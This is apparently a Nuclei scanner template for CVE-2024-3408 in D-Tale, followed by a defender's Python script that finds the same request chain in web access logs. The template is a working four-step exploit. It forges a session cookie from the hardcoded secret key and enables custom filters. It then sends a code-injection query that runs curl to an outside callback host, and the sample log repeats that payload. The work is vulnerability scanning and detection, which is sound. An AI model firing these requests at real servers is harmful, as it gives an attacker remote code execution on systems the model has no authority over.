id: CVE-2024-3408

info:
  name: D-Tale 3.10.0 - 3.15.1 - Authentication Bypass & Remote Code Execution
  author: ohmygod20260203
  severity: critical
  description: |
    man-group/dtale 3.10.0 contains an authentication bypass and remote code execution vulnerability caused by improper input validation and a hardcoded SECRET_KEY in the Flask configuration, letting attackers forge session cookies and execute arbitrary code. Exploitation requires the attacker to be able to reach the application.
  impact: |
    Attackers can bypass authentication and execute arbitrary code on the server, leading to full system compromise.
  remediation: |
    Update to the latest version where the vulnerability is fixed, or remove the hardcoded SECRET_KEY and implement proper input validation.
  reference:
    - https://huntr.com/bounties/57a06666-ff85-4577-af19-f3dfb7b02f91
    - https://github.com/man-group/dtale/commit/32bd6fb4a63de779ff1e51823a456865ea3cbd13
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-3408
    cwe-id: CWE-94,CWE-798
    epss-score: 0.91737
    epss-percentile: 0.99701
  metadata:
    verified: true
    max-request: 4
    vendor: man-group
    product: dtale
    shodan-query: title:"D-Tale"
    fofa-query: title="D-Tale"
  tags: cve,cve2024,dtale,rce,auth-bypass,code-injection,man-group,intrusive,vkev

variables:
  session_cookie: "eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoibnVjbGVpIn0.aYJDsw.w3AZyplKpvDzuqV5CJIsYdRbKYg"

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        GET /dtale/popup/upload HTTP/1.1
        Host: {{Hostname}}
        Cookie: session={{session_cookie}}

    matchers-condition: and
    matchers:
      - type: word
        internal: true
        words:
          - "D-Tale"

      - type: status
        internal: true
        status:
          - 200

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - 'id="version"\s+value="([^"]+)"'

  - raw:
      - |
        POST /dtale/upload HTTP/1.1
        Host: {{Hostname}}
        Cookie: session={{session_cookie}}
        Content-Type: multipart/form-data; boundary=----nucleiboundary

        ------nucleiboundary
        Content-Disposition: form-data; name="test.csv"; filename="test.csv"
        Content-Type: text/csv

        a,b
        1,2
        ------nucleiboundary
        Content-Disposition: form-data; name="header"

        true
        ------nucleiboundary
        Content-Disposition: form-data; name="separatorType"

        comma
        ------nucleiboundary
        Content-Disposition: form-data; name="separator"


        ------nucleiboundary--

    matchers-condition: and
    matchers:
      - type: word
        internal: true
        words:
          - "data_id"
          - "success"
        condition: and

      - type: status
        internal: true
        status:
          - 200

    extractors:
      - type: regex
        name: data_id
        internal: true
        group: 1
        regex:
          - '"data_id"\s*:\s*"?(\d+)"?'

  - raw:
      - |
        GET /dtale/update-settings/{{data_id}}?settings=%7B%22enable_custom_filters%22%3Atrue%7D HTTP/1.1
        Host: {{Hostname}}
        Cookie: session={{session_cookie}}

    matchers-condition: and
    matchers:
      - type: word
        internal: true
        words:
          - '"success"'

      - type: status
        internal: true
        status:
          - 200

  - raw:
      - |
        GET /dtale/test-filter/{{data_id}}?query=%40pd.core.frame.com.builtins.__import__(%27os%27).system(%27curl+{{interactsh-url}}%27)&save=true HTTP/1.1
        Host: {{Hostname}}
        Cookie: session={{session_cookie}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"
        condition: or

      - type: status
        status:
          - 200
# digest: 490a0046304402206c41c4de0cd04450dd0e1c8b7d389ce5f47862f3c6408af999f3798de493aed30220546a43e85d9474bf60ad0897fbb11f97e63f90f0c03d72156d6eb1d5cd1714e0:922c64590222798bb761d5b6d8e72950
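The template's request chain leaves a recognisable trail in a web server's access log: an `update-settings` call that turns on `enable_custom_filters`, followed by a `test-filter` call whose `query` parameter escapes the pandas query DSL into Python builtins. The following detection script is an added example for defenders; it is not part of this template or of the dtale project. It parses combined-format access log lines (the sample lines are constructed, not real traffic), flags the two request types separately, and reports source addresses that performed both steps. The token list `SUSPICIOUS_TOKENS` and the alert labels are this example's own choices.

```python
import json
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access log (combined log format); not real traffic.
# 10.0.0.5 walks the template's settings -> filter chain, 10.0.0.9 sends a benign filter.
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2024:12:00:01 +0000] "GET /dtale/popup/upload HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [10/May/2024:12:00:02 +0000] "POST /dtale/upload HTTP/1.1" 200 64 "-" "Mozilla/5.0"
10.0.0.5 - - [10/May/2024:12:00:03 +0000] "GET /dtale/update-settings/1?settings=%7B%22enable_custom_filters%22%3Atrue%7D HTTP/1.1" 200 20 "-" "Mozilla/5.0"
10.0.0.5 - - [10/May/2024:12:00:04 +0000] "GET /dtale/test-filter/1?query=%40pd.core.frame.com.builtins.__import__(%27os%27).system(%27curl+http%3A%2F%2Fcallback.example%27)&save=true HTTP/1.1" 200 30 "-" "Mozilla/5.0"
10.0.0.9 - - [10/May/2024:12:05:00 +0000] "GET /dtale/test-filter/1?query=a%20%3E%201 HTTP/1.1" 200 30 "-" "Mozilla/5.0"
"""

# Minimal combined-log-format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Substrings in a decoded `query` value that do not belong in a legitimate
# pandas filter expression and indicate an attempt to reach Python builtins.
SUSPICIOUS_TOKENS = ("__import__", "__builtins__", "builtins", ".system(",
                     "subprocess", "eval(", "exec(")


def parse_line(line):
    """Return a dict with ip/ts/method/path/params/status, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query)  # parse_qs percent-decodes values
    return rec


def classify(rec):
    """Label a parsed request as one of the two chain steps, or None."""
    path = rec["path"]
    if path.startswith("/dtale/update-settings/"):
        raw = rec["params"].get("settings", [""])[0]
        try:
            settings = json.loads(raw)
        except ValueError:
            settings = {}
        if isinstance(settings, dict) and settings.get("enable_custom_filters") is True:
            return "custom-filters-enabled"
    if path.startswith("/dtale/test-filter/"):
        # Decode once more to defeat double-encoded payloads.
        query = unquote(rec["params"].get("query", [""])[0])
        if any(tok in query for tok in SUSPICIOUS_TOKENS):
            return "code-injection-attempt"
    return None


def detect(log_text):
    """Return (ip, label, path) for every request matching a chain step."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec)
        if label:
            alerts.append((rec["ip"], label, rec["path"]))
    return alerts


def exploit_chains(log_text):
    """Source IPs that enabled custom filters and also sent a suspicious filter."""
    seen = {}
    for ip, label, _ in detect(log_text):
        seen.setdefault(ip, set()).add(label)
    required = {"custom-filters-enabled", "code-injection-attempt"}
    return sorted(ip for ip, labels in seen.items() if required <= labels)


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print("ALERT", *alert)
    print("full chain from:", exploit_chains(SAMPLE_LOG))
```

A single `code-injection-attempt` hit is already worth an alert on its own; requiring both steps simply raises confidence that the settings change was not an operator's. Because access logs normally omit cookies, this script cannot see the forged `session` cookie that makes the auth bypass possible; the fix for that part is the remediation stated above, a non-hardcoded SECRET_KEY.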